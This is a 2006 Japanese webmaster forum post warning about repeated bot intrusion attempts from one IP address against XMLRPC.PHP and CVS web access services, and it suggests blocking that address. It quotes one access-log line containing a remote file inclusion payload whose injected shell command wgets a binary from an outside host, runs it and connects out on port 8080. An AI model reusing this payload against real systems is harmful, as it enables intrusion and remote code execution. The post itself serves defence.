スレッド表示 | 新しいものから | 前のトピック | 次のトピック | 下へ |
投稿者 | スレッド |
---|---|
webadm | 投稿日時: 2006-1-16 5:50 |
Webmaster 登録日: 2004-11-7 居住地: 投稿: 3107 |
217.96.23.43からのBot侵入未遂依然として継続中 ずっと以前から217.96.23.43からXMLRPC.PHPの古い脆弱性を狙ったBot侵入アクセスが繰り返されていましたが、最近オープンソース開発コミュニティでよく使われているCVS WEB ACCESSサービスの脆弱性を狙った手口も使っているようです。
217.96.23.43 - - [15/Jan/2006:20:25:21 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUE ST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.2 03.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" CVS repositoryへのWeb accessサービスを提供しているサイトは要チェックかも。 少なくとも217.96.23.43からのアクセスをブロックする必要はあると思います。ほとんど毎日やってきますから。 |
スレッド表示 | 新しいものから | 前のトピック | 次のトピック | トップ |
投稿するにはまず登録を | |